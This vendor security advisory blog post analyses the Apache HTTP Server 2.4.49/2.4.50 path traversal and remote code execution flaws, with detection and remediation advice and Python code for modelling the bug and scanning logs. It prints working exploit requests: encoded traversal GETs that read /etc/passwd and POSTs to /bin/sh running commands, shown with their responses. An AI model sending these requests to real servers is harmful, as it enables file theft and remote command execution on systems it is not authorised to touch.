URL: https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-executi...

APACHE HTTP SERVER PATH TRAVERSAL & REMOTE CODE EXECUTION (CVE-2021-41773 &
CVE-2021-42013)

Mayank Deshmukh, Senior Web Application Signatures Engineer
October 27, 2021 (updated December 16, 2022) - 8 min read

Last updated on: December 16, 2022

TABLE OF CONTENTS

 * About CVE-2021-41773
 * About CVE-2021-42013
 * Detecting the Vulnerabilities with Qualys WAS
 * Report
 * Solution
 * Credits
 * References
 * Contributor

On October 4, 2021, the Apache HTTP Server Project released a security advisory
for a path traversal and file disclosure vulnerability in Apache HTTP Server
2.4.49 and 2.4.50, tracked as CVE-2021-41773 and CVE-2021-42013. In the
advisory, Apache also noted that “the issue is known to be exploited in the
wild”, and it was later identified that the vulnerability can be abused to
perform remote code execution. Exploiting either vulnerability requires the
Apache HTTP Server to be running in a non-default configuration.


Because the vulnerabilities are configuration dependent, checking the version of
the Apache web server is not enough to identify vulnerable servers. With both
CVEs being actively exploited, Qualys Web Application Scanning has released QIDs
150372, 150373 and 150374, which send specially crafted HTTP requests to the
target server to determine whether it is exploitable. Once a vulnerability is
detected, users can remediate it by upgrading to Apache HTTP Server 2.4.51 or
later.


ABOUT CVE-2021-41773

According to CVE-2021-41773, Apache HTTP Server 2.4.49 is vulnerable to Path
Traversal and Remote Code execution attacks.


PATH TRAVERSAL ANALYSIS

The path traversal vulnerability was introduced by a new code change for path
normalization, i.e., the logic that removes unwanted or dangerous parts from the
pathname of a request URL. That logic was inadequate to detect the different
ways in which the path traversal sequence “dot-dot-slash (../)” can be encoded.

To prevent path traversal attacks, the normalization function, which is
responsible for resolving URL-encoded values in the requested URI, resolved the
encoded values one at a time. Hence, when the second dot is URL-encoded as %2e,
the logic fails to recognize %2e as a dot and does not decode it before the
dot-dot check; writing ../ as .%2e/ therefore bypasses the check.

In addition to the path traversal check bypass, for an Apache HTTP server to be
vulnerable its configuration must either contain a Directory directive for the
entire server filesystem with Require all granted, or the Directory directive
must be missing from the configuration file entirely.

VULNERABLE CONFIGURATION:

<Directory />
    Require all granted
</Directory>


Therefore, bypassing the dot-dot check with .%2e and chaining it with the
misconfigured Directory directive allows an attacker to read arbitrary files,
such as passwd, from the vulnerable server's filesystem.

EXPLOITATION: PATH TRAVERSAL

Request:

GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1



Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 08:13:02 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin



Please note that the default configuration of Apache HTTP Server has the
Directory directive for the entire filesystem set to Require all denied and
hence is not vulnerable.


REMOTE CODE EXECUTION ANALYSIS

While CVE-2021-41773 was initially documented as a path traversal and file
disclosure vulnerability, additional research concluded that it can be further
exploited to achieve remote code execution when the mod_cgi module is enabled on
the Apache HTTP Server. This allows an attacker to leverage the path traversal
vulnerability and call any binary on the system using HTTP POST requests.

CONFIGURATION TO ENABLE MOD_CGI MODULE:

<IfModule !mpm_prefork_module>
        LoadModule cgid_module modules/mod_cgid.so
</IfModule>


By default the mod_cgi module is disabled on Apache HTTP Server, because the
LoadModule line above is commented out in the configuration file. Hence, when
mod_cgi is enabled and “Require all granted” is applied to the filesystem
Directory directive, an attacker can remotely execute commands on the Apache
server.

EXPLOITATION: REMOTE CODE EXECUTION

Request:

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close

echo;id



Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 09:58:23 GMT
Server: Apache/2.4.49 (Unix)
Connection: close
Content-Length: 45
uid=1(daemon) gid=1(daemon) groups=1(daemon)



Looking at the HTTP POST request for RCE, /bin/sh is the system binary that
executes the payload echo;id and prints the output of the id command in the
response.


ABOUT CVE-2021-42013

CVE-2021-42013 was introduced because the fix for CVE-2021-41773 in Apache HTTP
Server 2.4.50 was insufficient: it did not cover double URL encoding. The
vulnerable configurations therefore remained the same, but the payload used
against 2.4.49 was double URL encoded against 2.4.50 to carry out the same path
traversal and remote code execution attacks.

The attack against 2.4.49 encoded the second dot (.) as %2e; for version 2.4.50
the same dot was double URL encoded as %%32%65.


ENCODING ANALYSIS

Conversion: dot → %2e → %%32%65

 * 2 is encoded to %32
 * e is encoded to %65
 * And original % left as it is

Thus a dot is equivalent to %%32%65, which turns ../ into %%32%65%%32%65/ in
double URL encoded form.
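The two encoding steps above and the single-pass normalization described under the path traversal analysis can be modelled in a few lines of Python. This is an added illustration, not Apache's normalization code and not part of the Qualys post: naive_is_traversal stands in for the class of check that inspects raw path segments before decoding, fully_decode decodes to a fixed point, and escapes_root is the check a reviewer would want, resolving the decoded path and testing whether it leaves the served directory. The function names, the /cgi-bin root and the sample paths are this example's own; the paths mirror the request lines shown in the write-up plus one benign request.

```python
"""Model of the normalization defect and the encodings discussed above.

Added illustration, not Apache's normalization code and not part of the
Qualys post.  Function names and the sample paths are this example's own;
the paths mirror the request lines shown in the write-up plus one benign
request.
"""
import posixpath
from urllib.parse import unquote

# Constructed sample request paths (assumption: /cgi-bin is the served root).
SAMPLE_PATHS = {
    "plain":  "/cgi-bin/../../../../etc/passwd",
    "single": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd",            # 2.4.49 form
    "double": "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",  # 2.4.50 form
    "benign": "/cgi-bin/printenv",
}


def single_encode(ch: str) -> str:
    """Percent-encode one character: '.' -> '%2e'."""
    return "%" + format(ord(ch), "02x")


def double_encode(ch: str) -> str:
    """Encode the hex digits of the single-encoded form and keep the leading
    percent sign: '.' -> '%2e' -> '%%32%65', as in the conversion above."""
    once = single_encode(ch)
    return "%" + "".join(single_encode(c) for c in once[1:])


def naive_is_traversal(path: str) -> bool:
    """Toy single-pass check that inspects raw segments before decoding.

    It stands in for the class of defect described in the text: '.%2e' and
    '%%32%65%%32%65' are not literally '..', so they slip through.
    """
    return any(segment == ".." for segment in path.split("/"))


def fully_decode(path: str, max_passes: int = 8) -> str:
    """Percent-decode until the string stops changing.

    One pass turns '%%32%65' into '%2e', a second turns '%2e' into '.'.
    The pass limit keeps a hostile input from making the loop spin.
    """
    for _ in range(max_passes):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_root(path: str, root: str = "/cgi-bin") -> bool:
    """Decode first, normalize second: True if the path resolves outside root."""
    resolved = posixpath.normpath(fully_decode(path))
    return not (resolved == root or resolved.startswith(root + "/"))


def compare(paths: dict) -> dict:
    """Return {name: (naive_verdict, decode_first_verdict)} for each sample."""
    return {name: (naive_is_traversal(p), escapes_root(p)) for name, p in paths.items()}


if __name__ == "__main__":
    print("dot ->", single_encode("."), "->", double_encode("."))
    for name, (naive, robust) in compare(SAMPLE_PATHS).items():
        print(f"{name:7s} naive={naive!s:5s} decode-first={robust}")
```

The point of the comparison is the order of operations: a check that runs before (or interleaved with) decoding only ever sees one layer of encoding, while decoding to a fixed point and normalizing afterwards gives the same verdict for ../, .%2e/ and %%32%65%%32%65/.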


EXPLOITATION: PATH TRAVERSAL

Request:

GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1



Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 10:16:51 GMT
Server: Apache/2.4.50 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin




EXPLOITATION: REMOTE CODE EXECUTION

Request:

POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

echo;id



Response:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 10:42:40 GMT
Server: Apache/2.4.50 (Unix)
Connection: close
Content-Length: 45
uid=1(daemon) gid=1(daemon) groups=1(daemon)




DETECTING THE VULNERABILITIES WITH QUALYS WAS

Customers can detect these vulnerabilities with Qualys Web Application Scanning
using the following QIDs:

 * 150372: Apache HTTP Server Path Traversal (CVE-2021-41773)
 * 150373: Apache HTTP Server Remote Code Execution (CVE-2021-41773)
 * 150374: Apache HTTP Server Multiple Vulnerabilities (CVE-2021-42013)

QID 150372 – Apache HTTP Server Path Traversal (CVE-2021-41773)
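Scanner-side detection as above tests the live server; responders also want to find attempts in existing logs. The following is an added example and is not part of Qualys WAS or of the post: it sweeps Apache combined-format access log lines (the lines below are constructed, with documentation-range client addresses and made-up sizes, their request lines following the ones shown in the write-up) and reports every request whose percent-decoded path contains a dot-dot segment, together with the response status. Apache writes the request line as received, so the single- and double-encoded forms appear verbatim in the log and must be decoded before matching; the regular expression, the SYSTEM_BIN_DIRS list and the field names are this example's own.

```python
"""Sweep Apache access logs for the encoded traversal patterns described above.

Added example, not part of Qualys WAS or of the post.  The log lines are
constructed (documentation-range client addresses, made-up sizes); the
request lines follow the ones shown in the write-up.
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines.  Apache logs the request line as
# received, so the percent-encoded forms appear verbatim.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2021:08:13:02 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 926 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Oct/2021:09:58:23 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 45 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Oct/2021:10:16:51 +0000] "GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 403 199 "-" "curl/7.68.0"
192.0.2.9 - - [18/Oct/2021:10:20:00 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.0.2.9 - - [18/Oct/2021:10:21:00 +0000] "GET /cgi-bin/printenv?x=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Combined log format up to the status code; the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) '
)

# Resolved locations that indicate the CGI handler was pointed at a system
# shell or binary (the RCE form); extend for the platform at hand.
SYSTEM_BIN_DIRS = ("/bin/", "/usr/bin/", "/sbin/", "/usr/sbin/")


def fully_decode(s: str, max_passes: int = 8) -> str:
    """Percent-decode to a fixed point so '%%32%65' and '%2e' both become '.'."""
    for _ in range(max_passes):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def traversal_findings(log_text: str) -> list:
    """Return one finding per request whose decoded path has a '..' segment."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        raw_path = m["target"].split("?", 1)[0]
        decoded = fully_decode(raw_path)
        if ".." not in decoded.split("/"):
            continue
        resolved = posixpath.normpath(decoded)
        kind = ("possible command execution" if m["method"] == "POST"
                and resolved.startswith(SYSTEM_BIN_DIRS) else "path traversal")
        findings.append({
            "client": m["client"],
            "time": m["time"],
            "method": m["method"],
            "status": int(m["status"]),
            "raw": raw_path,
            "resolved": resolved,
            "encoded": raw_path != decoded,  # True for the %2e / %%32%65 forms
            "kind": kind,
            "served": m["status"] == "200",  # the server answered with content
        })
    return findings


if __name__ == "__main__":
    for f in traversal_findings(SAMPLE_LOG):
        flag = "SERVED" if f["served"] else "blocked"
        print(f"{f['time']} {f['client']:13s} {f['method']:4s} {f['status']} {flag:7s} "
              f"{f['kind']}: {f['raw']} -> {f['resolved']}")
```

A 200 on a request that resolves outside the document tree is the record worth escalating; a 403 on the same path is consistent with the default Require all denied directive doing its job, which is why the status is carried into each finding rather than filtered out.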


REPORT

Once the vulnerability is detected by Qualys WAS, users will see results similar
to the following for QID 150372 in the vulnerability scan report:


SOLUTION

Organizations using Apache HTTP Server 2.4.49 or 2.4.50 are advised to upgrade
to HTTP Server 2.4.51 or a later version to remediate CVE-2021-41773 and
CVE-2021-42013; more information is available in the Apache security advisory.

To maintain good security practice, Qualys also advises users to ensure the
following:

 * The mod_cgi module stays disabled (its default) unless the business
   requires it.
 * The filesystem Directory directive is set to Require all denied, as shown
   below:

<Directory />
    Require all denied
</Directory>



CREDITS


APACHE SECURITY ADVISORY:

https://httpd.apache.org/security/vulnerabilities_24.html


CVE DETAILS:

https://nvd.nist.gov/vuln/detail/CVE-2021-41773
https://nvd.nist.gov/vuln/detail/CVE-2021-42013


CREDITS FOR THE VULNERABILITY DISCOVERY GO TO:

 * Ash Daulton along with the cPanel Security Team
 * Juan Escobar from Dreamlab Technologies
 * Fernando Muñoz from NULL Life CTF Team
 * Shungo Kumasaka and Nattapon Jongcharoen


REFERENCES:

 * https://twitter.com/ptswarm/status/1445376079548624899
 * https://twitter.com/hackerfantastic/status/1445529822071967745
 * https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog


CONTRIBUTOR

Jyoti Raval, Lead Web Application Security Analyst, Qualys

Written by
Mayank Deshmukh, Senior Web Application Signatures Engineer
Write to Mayank at madeshmukh@qualys.com